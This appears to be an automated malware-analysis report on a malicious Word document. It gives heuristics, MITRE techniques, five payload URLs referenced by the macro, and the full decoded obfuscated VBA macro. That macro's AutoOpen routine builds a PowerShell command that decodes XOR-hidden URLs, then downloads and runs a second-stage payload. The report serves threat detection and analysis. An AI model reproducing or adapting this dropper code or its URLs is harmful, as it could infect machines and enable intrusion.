MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening the document. Critical heuristics indicate the use of WScript.Shell and Shell() calls, strongly suggesting the macro attempts to download and execute a secondary payload. The obfuscated nature of the VBA code prevents a more detailed analysis of its specific actions or the identification of a concrete malware family.
Heuristics 10
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
hoQaSK = rbNpB - moRtT * 19309 / qrQoZ / 82301 * 44185 * FhikwG + 98640 - (zHFuS / tViZjw) PNFAA = PRrEPwrE + CreateObject("Wscript.shell").Run(NCUUluW + Chr(vbKeyP) + zNOCrKJIIw + Chr(vbKeyO) + iaBWhJiwV + winkzkDX, 905382965 - 905382965) GLAWG = aAFPRU - RAujV * 39969 / SlNpWP / 49672 * 15969 * ZtwSQS + 95872 - (cLzVW / HGdtKH) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
hoQaSK = rbNpB - moRtT * 19309 / qrQoZ / 82301 * 44185 * FhikwG + 98640 - (zHFuS / tViZjw) PNFAA = PRrEPwrE + CreateObject("Wscript.shell").Run(NCUUluW + Chr(vbKeyP) + zNOCrKJIIw + Chr(vbKeyO) + iaBWhJiwV + winkzkDX, 905382965 - 905382965) GLAWG = aAFPRU - RAujV * 39969 / SlNpWP / 49672 * 15969 * ZtwSQS + 95872 - (cLzVW / HGdtKH) -
Payload URL decoded from an encoded PowerShell loader (5 URLs) high OLE_VBA_ENCODED_PS_DROPPER_URLA VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array — decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "HtUrJEfW" Sub AutoOpen() On Error Resume Next -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.beraysenbas.com/hs2Jv5Y/ Referenced by macro
- http://healthprotectionplans.com/e3Se04G/Referenced by macro
- http://www.homestaynew.com/MNh/Referenced by macro
- http://www.bodysync.ir/tQseO/Referenced by macro
- http://www.bachtalias.com/Pv7u9/Referenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11557 bytes |
SHA-256: 64508118f2020ecb86e8334a386a25f4fcc1843d1e19b14bdd819c1b9a2aca9c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
272 of 472 identifiers look randomly generated (e.g. 'iHlwkHGwUUm') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "WzUrJtA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "HtUrJEfW"
Sub AutoOpen()
On Error Resume Next
qrWsvh = ttFRrA - BFnIj * 15086 / JCzcwh / 19514 * 23740 * jhjAn + 95251 - (DYihBh / mPEjTw)
UHNJi = mlqNi - tihkqC * 69204 / XiOTD / 24831 * 40552 * ioIvUM + 44220 - (aoDHFq / CzWfo)
rNuGtK = jYojE - zpiACl * 78438 / GWjXR / 34459 * 84211 * nzhUr + 54142 - (PjwYT / biYcz)
EjQbMD = BBrHET - iTZju * 74188 / zuWWN / 55519 * 50344 * QTIJJ + 99920 - (uwMNS / JRicH)
JCDFQ = cafzG - EWKDI * 5756 / QLHBMz / 23366 * 91706 * wLXZR + 34451 - (KImjb / lmlspC)
Ozhwj = WQzAfj - ZjLzT * 7521 / jjBam / 54815 * 36998 * MrzqQ + 22460 - (izBGI / nYiBU)
nUiDi (khzulGU + jpswWijZzH)
zfUYn = sdsjWP - VwmWUw * 92162 / qzktcT / 17645 * 1334 * COvfaF + 70900 - (naZHT / lEjnZd)
cYtfhz = ptisPv - OKCLt * 27337 / dfQmA / 51402 * 54908 * YlFtaa + 34844 - (LLIUdJ / PzwMh)
GSLMv = aEouF - bZfkXz * 89840 / XRZdT / 61957 * 38601 * qdrtF + 24686 - (CEHMt / vYArOm)
End Sub
Function nUiDi(iaBWhJiwV)
On Error Resume Next
vRaqRR = NrSjfa - OljMAJ * 594 / HOzqEl / 24033 * 79353 * sOhYEi + 81562 - (jUblk / tJVBO)
ibZvuO = jMkqO - AEpFKK * 46627 / RALEbh / 77005 * 15684 * WEhmA + 91618 - (dDvZkN / zPuoZ)
dQlmGj = fKfjcD - IURuqB * 2933 / VWTXUz / 78843 * 93127 * jXOZzK + 86461 - (ZApdu / iPAckP)
YXnLqH = obSArc - BUOoI * 55273 / MLjdEw / 62621 * 67910 * jfwDl + 54083 - (MiWns / ZOSDD)
bQCrHr = XbBcnM - tiFCvm * 70111 / mNPor / 96218 * 90792 * zHYYd + 33060 - (srPJfV / dGFMz)
hoQaSK = rbNpB - moRtT * 19309 / qrQoZ / 82301 * 44185 * FhikwG + 98640 - (zHFuS / tViZjw)
PNFAA = PRrEPwrE + CreateObject("Wscript.shell").Run(NCUUluW + Chr(vbKeyP) + zNOCrKJIIw + Chr(vbKeyO) + iaBWhJiwV + winkzkDX, 905382965 - 905382965)
GLAWG = aAFPRU - RAujV * 39969 / SlNpWP / 49672 * 15969 * ZtwSQS + 95872 - (cLzVW / HGdtKH)
quYiXi = pKSio - ZpXkN * 39403 / BQtSPG / 18087 * 75528 * JYwSv + 91969 - (mWXwQ / HJsVJq)
JrQEX = LLHilI - FSiUtY * 61910 / ACGlp / 10284 * 90763 * RLBvcZ + 32739 - (baJZQ / dwNqm)
End Function
Function khzulGU()
On Error Resume Next
KEoHN = 32783 * BEqfAW - BWIQQn * POWYw / EmsaEZ * CnQMN / IfMZsr - DQPzW
bwrji = nJRZF - cJrFs - cqdrwj - uQasWX + OzJUN + FUaNDj * (QYriv - lInsk)
wmvpSi = 32413 * qPMQa - EoNFvD * fkCpd / ouoXsD * cfGwwd / dRQAJS - DPCJE
VSQlaJm = "wershe" + "ll " + " " + " " + " & " + Chr(40) + " $V" + "ERBoS" + "epRef" + "EreN" + "ce.t"
hmCnLP = 8047 * rUfnru - ijbbm * URzqnn / vViovG * ALAZFG / VidocJ - tzVuj
HRCtz = 79995 * cZBsU - zzYhP * RHrNT / fKPli * NnkVKd / wIbTD - YjzVT
NUDzXc = 11899 * Vlqskz - TfCVf * wnVBL / zCWNuO * jfHDC / AHzsmv - MlaUTY
iHlwkHGwUUm = "ostrI" + "NG" + Chr(40) + Chr(41) + "[1,3" + "]" + Chr(43) + "'X'" + "-joIn" + "''" + Chr(41) + " " + Chr(40) + " [St"
sTjVr = 30390 * wpshvI - fZQctk * TJNnUz / rnqSLN * ZprvE / bTwzw - BoSBA
jPhhv = 22900 * IkzYvd - OjLbz * fszviG / RMcBt * NmUwa / qisXz - rScwB
QdYKT = 66399 * QJHBB - kuoFj * hpYJA / QqFwn * mpOuk / PWJYoD - SwiMV
dMoIZciQM = "rInG]::" + "joIn" + Chr(40) + " '' ," + " " + Chr(40) + " '96J29" + "w44@39" + "m121A4" + "2>33@51" + "w105A4" + "3J38"
WLIsUN = 21871 * XirlV - jfQrG * Botsau / AioCid * HZdMWv / lilUd - DbqQuw
iidTP = 85844 * YzDsQ - ViPLA * JEqNPI / VphOh * klEqIW / BQLPSR - WhmDk
jhSPRZ = 30000 * ijbMH - GHCEU * iPKHY / zvZoXI * iSZHOu / fzCuJH - cwUoL
lAnDfrZ = "z46w33J3" + "9A48w10" + "0I10A" + "33w48<1" + "06w19I" + "33z38" + "!7w40A45" + "J33>42<" + "48m127<" + "96@46A" + "43A62A12"
BBGlE = 16349 * auHWj - zljGBi * QkDUQ / jHodv * lzLjpj / tjzfNo - NkEtqX
lQRXK = 82379 * cUluL - fYCjA * KYfiMP / QaVwFA * ivSBC / XZULOI - qczZQT
PkQzlV = 99141 * FmQLov - nEtZEk * SFqfi / wCumXv * PujEL / RdLOBA - SwAzQT
NwBwNzFl = "1J99A44" + "J48<48!" + "52m126z" + "107@1" + "07!5" + "1w51" + "A51A106A3" + "8m33@54!"
CMiEK = 38099 * ZpjjA - IizAiJ * poRiPm / aYklw * kTsKV / PJZjFE - XbfHLF
vRLHF = 73600 * jCrin - aftVpO * TqHro / wYzCvV * tazjb / ZplbUk - HLnCf
mUNuAo = 45364 * rBEzj - Loqoiv * kQFMdo / fvRZj * kPFwK / PDRXfH - wLnoS
jIOUd = "37<61>55" + ">33<42w38" + "z37>55" + "!106" + "@39J4" + "3@41z10" + "7m44<" + "55A11" + "8<14A50" + ">113m29!"
IiLidP = 13889 * oolnu - LllcqP * UzFZO / pnoLK * svzzO / YaBhjB - vPriS
JzBEIi = 44039 * IhvkfR - twisiw * qSsZEH / DsHwrW * iLzQn / GWVnzq - CPEwok
wVFnl = 10440 * PwRRA - bhCfLl * qRoXn / ENSCw * VrMln / NuFXa - jjDZf
RutoTVG = "107w4w44" + "m48<48<5" + "2A126A10" + "7<107J44" + "m33>37" + "@40>48z" + "44@52J" + "54@4" + "3m48@33" + "w39A48>4"
dLjBdK = 79303 * utIVN - dwqEY * rKQGzH / MoLEwV * wHmPwD / DKNjYw - Brlzs
jfsvdj = 63237 * AVAvwv - HimPv * XwqRS / fnGNfi * STRaN / EFHstJ - iqcBQJ
rTvaEW = 34787 * MjoMAO - WLbIVt * zCWYKp / zZHEv * cMMKZ / OqbYXY - cijJoW
uBtiCwrHaO = "5>43w42<5" + "2w40!37" + "J42m5" + "5<106!3" + "9I43<41z1" + "07!33" + "w119I23"
GmBFvN = 9928 * iQjwtO - qDpqrl * chWGm / jBiMkW * uNwNG / zfsOd - cpdYo
DTsEfL = 55627 * PJhHE - wKzQi * fzYiwA / MhQPSh * DITIf / IzbRr - TbdUj
pHmKTj = 77946 * WwhhWN - BfcEb * olojTt / KtDdui * OakuPZ / jAwKrP - aJATM
JQJEsZiC = "@33m116@1" + "12A3!10" + "7J4A" + "44@48w48" + "I52w1" + "26z107" + "@107m51z" + "51!51I1" + "06@44" + "@43!4"
dKptk = 14847 * XLZhs - uEAXPw * oQjqDf / AZjnkV * jXwBHU / WNthL - zTBZi
AVzazp = 12077 * cvEmo - Ibvip * EHlqZ / djjjCK * ouscJu / SOEFt - CwtzO
cdNaw = 81631 * LAzim - XINhBW * diRCq / rTwhX * IjtGT / AKDJGY - GjnDmm
jjUIh = "1z33z5" + "5>48" + "I37A61A42" + "J33m" + "51m106A39" + "w43J4" + "1A107<9m"
wqSCa = 36620 * APvVEX - RrBjH * WqAmZj / HGDuNT * ZPTKUb / NuQvq - zulUZ
CWWzLL = 69086 * wlOTZW - NiBujB * EUXsT / ZDPKvY * lMvuH / KLRun - MdVJCr
FjHpjc = 82767 * ktMAI - icBYrO * WIvkqj / wMVjU * OMSZm / dCiTiP - FmUtMd
nwnsNwGPcV = "10w44w10" + "7I4!44J" + "48>48@52J" + "126J107!" + "107I" + "51!51m51A" + "106A38J43" + "<32<" + "61<55!6"
mqiwl = 74539 * rzFPX - mrcDH * WfCltH / FvMRCh * jPpGHi / XOaAj - MKqsGJ
PiXLF = 80109 * YcYYcj - XRKblJ * crpMUC / jcTIFJ * fpGUz / FaGvFj - iUKRbT
ztkEpr = 99674 * UfiDhk - WCVwYd * RbkMYY / ETKsvp * fkRPjc / iszwz - noXKk
GTjYJROli = "1J42<" + "39w106m45" + ">54!1" + "07>48z2" + "1m55z33z1" + "1w107"
khzulGU = VSQlaJm + iHlwkHGwUUm + dMoIZciQM + lAnDfrZ + NwBwNzFl + jIOUd + RutoTVG + uBtiCwrHaO + JQJEsZiC + jjUIh + nwnsNwGPcV + GTjYJROli
uICtZh = 27672 * bhwPXB - EiVBO * hLGLOz / YWKtc * NinUw / bDjHpH - lMwuaW
wcJUc = 37129 * nPLXKm - wrRDjp * vijnN / zGQwAI * qOWQpw / poXUn - BdwXT
uNwwh = 21581 * NUFXFn - nWROZ * nfADR / RNpbb * XWcAhr / kBNjbk - Twzqfj
End Function
Function jpswWijZzH()
On Error Resume Next
MotSn = 47590 * sYDZwh - PMKzz * SzhjE / XjizFz * qWiLwz / QRSiQ - QrlpNK
ESOMs = 58919 * tTYsdn - QYnoZb * PZwYTh / VQwvvi * EOnpN / riprw - ACXKBG
umOGJ = 25586 * BQJbz - HrilBO * ivBfDS / Jfvsk * uuDHXB / mOAHrj - nZIzow
YwGmJFj = "J4I44J48@" + "48J52I126" + "w107!" + "107I51w5" + "1>51z1" + "06z38<37!" + "39I44>4" + "8>37I" + "40!4"
loSwAC = 84261 * fNjUwY - ESFRV * spAfa / DmtUw * pKPTna / acpwwN - HdwLCJ
UwljC = 83106 * EVUQq - jMnaN * fNTvtn / dWjXw * mkavS / UKfit - qAdIam
itwSR = 50622 * oJmskX - Nzlif * uaDtB / jIZqi * mfKRQ / WzFlS - DOqkt
dMkkYMs = "5@37A" + "55>10" + "6<39I" + "43J41I107" + "A20J" + "50m115J" + "49@125A"
wlzAa = 48640 * TNwpQd - wPVnD * visVVz / aqlHBM * dJRtE / FivJmu - zGLCM
KhWlWE = 80114 * QzuiO - Eazrw * jkHfSI / Apnbv * tfAvB / GbKkW - bXAwd
wVPsbi = 51495 * QcconD - upwci * ZNnjia / lTfjuG * BNQpO / noGSVz - AFRMZi
HCUAjl = "107!99!10" + "6w23z5" + "2w40>4" + "5z48>108" + "w99w4" + "!99!10"
BGvJVp = 42359 * ijdtzM - SMDHDs * vmQjzH / OwpIB * iKmoGO / ipzZCi - arHSav
YIcJt = 8106 * Cwzttj - FjYIOE * kHVOjj / jCSJQn * tlGwKw / sJZbSC - ZsELai
LItor = 28388 * QlokwU - HaPBp * TGpqdP / jXqWhG * TBtAPA / OEJoE - PTRsR
rkipO = "9A127@96z" + "19>45m30z" + "100m121" + "J100J" + "99z114J1" + "17>117J9" + "9<127" + "m96z34A11" + "A9m121" + "@96@33>" + "42>50>" + "126m4"
wRiCmA = 72310 * YlnzM - lahWq * wbXjt / QMTuCV * ZzoaL / qDNoZi - ffbIl
zjETCK = 53224 * BtvRCr - vFhOmp * ECjCZC / QFzFw * FOiqp / NLVIrm - iTNjd
tEjVuv = 18417 * kZFiiR - mHwzVa * VkmzB / JkkLIL * PtiufC / GiIKrQ - tXiIQP
cbcHVc = "8z33" + "A41w52A11" + "1<99A24m9" + "9I111" + "J96A19>4" + "5J30I111m" + "99A10" + "6m33>" + "60@33!99J" + "127<34A" + "43!54@33" + ">37<39I4"
ztTHqI = 52445 * mhria - jwiEj * UmAOnl / hPSdP * JjmdnG / zjUIWK - VjEMXE
jwjwtb = 78450 * ouWWoO - dCUTdt * cbFkAP / GDsvi * wuzlaI / qNoUb - Aucnz
SNsFT = 10881 * tJUDbj - WzTuz * tkSrr / rnzLFG * qqWtX / BdFaz - uaczm
tzBlOr = "4@108A96z" + "28@1" + "6@13z100m" + "45<42I1" + "00<9" + "6w46!43m6" + "2z109" + "J63@" + "48A54!61@"
Awiprd = 41720 * YcNQm - XkYaSE * TZLkv / Kdihh * VOpck / BqGiwi - snuZDK
RawLiu = 2207 * pOLvw - zRtbA * vawcn / SnzCP * LZnfMi / bsKim - JblGd
ZThZXE = 93402 * Kuqvj - RkhHoi * NHkah / CVQEiW * uBhQFf / hfMsDz - aDMROf
VbFCYM = "63@96I" + "29w4" + "4!39w" + "106<0" + ">43w5" + "1m42" + "w40m43<37" + "J32>"
AodPD = 53140 * VRjqC - jSTYRw * sZAvYM / YwQRHY * rhFah / IvoCvU - wsbmjz
LLwwp = 27750 * wupLYn - PCQCJ * jhvsWj / cSDnQr * iqlSP / FilWj - KuLAwO
Manhrr = 68967 * XAPidk - lOwkHi * kwAEbt / XiiKww * tXjpG / YnmNqA - HMowp
kvWWkKA = "2z45@" + "40!33m108" + "J96w28I1" + "6m13>104m" + "100@96!3" + "4J11z9@10" + "9I127<2" + "3>48<37z" + "54J48I10" + "5I20w54"
ouqsi = 89939 * qFcpf - DjCzoA * WkiAf / zELAJ * QffEth / vWiKw - lIlaMk
PqphnQ = 81702 * zWjYh - ZsqOuA * ZzLmN / kZKqjU * jaDqwY / ZYRGp - PjPVZ
VHhEQp = 25358 * zVfFS - PRYiJ * PEvoa / RuwLiw * jTJwa / DUAwBC - iiWqM
ClZzfart = "z43A39" + "w33J55<" + "55<100@96" + "z34m11<" + "9A127!" + "38>54" + "J33m37!47" + ">127J"
EwVwJ = 32086 * IfpvW - HmrLcG * AlZwq / kPEIjG * kiwcbu / woZqFC - CjZjZ
DSLQLt = 57526 * XTclqj - jjFTzq * zOGul / DiXFz * uzXDwE / FfBYMK - QuCRX
IOTZY = 11487 * jtEXJ - nCdqPk * YSMLiq / UhffYG * aWKXDV / BDjChQ - XZtKz
tPUzdmFa = "57I39@3" + "7<48@39I" + "44A63A5" + "7!57'-sp" + "LIT '!" + "' -spL" + "IT'W'" + "-sPlI" + "t '<'-Sp" + "lit'Z' -s" + "plit '>" + "' -sPLit'"
wknOaY = 99853 * IrzrcE - nicLP * qKSVZS / WBYFA * WobwK / CrMLnK - FirpY
lpBIqi = 34020 * zOZwCs - jSSLO * XPcIB / ZwHlU * PKkUC / UDlBpK - iXBrH
roHaVs = 1430 * vSGSs - SilMmS * Nuiwi / NMafM * ZIVOO / DJpHY - svStX
QHmZnXPq = "A' -spl" + "IT'I' -s" + "PlIT'm" + "' -Sp" + "LIT '@'" + " -spLIT "
YTzoX = 46593 * VHoUE - njYIDV * jrNmfS / LfGIWk * bqzVG / jRHhB - AzcCUj
iCGPdu = 56058 * qhntUn - SSizTW * jIbGV / FjsTo * AJuKib / nOWVvn - MackwE
WmjGKI = 9698 * tpAjwU - LtamwS * Rkflp / ojdlb * NYvkmN / QncGA - VZljb
pSdwdab = "'j'|" + "fOReACH{" + " [cHa" + "r]" + Chr(40) + " $" + "_-bXOr" + " 0x44 " + Chr(41) + "}" + Chr(41) + Chr(41) + " " + Chr(41) + " "
jpswWijZzH = YwGmJFj + dMkkYMs + HCUAjl + rkipO + cbcHVc + tzBlOr + VbFCYM + kvWWkKA + ClZzfart + tPUzdmFa + QHmZnXPq + pSdwdab
anJpF = 16148 * Svrztw - KLNPO * Qzaifl / ZljhDW * ZOtBhj / jPWuV - SFjhk
kIVVwa = 48170 * mwKMO - CGCQJ * YuCNpd / hTtCzB * rmsDz / NtPRd - rvAPX
YEbMi = 19140 * YGhLK - XOkvSM * ibkjDk / QRUFC * CzdwCO / MLRwDM - wGiJNV
End Function
Attribute VB_Name = "JzoNEVwKz"
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.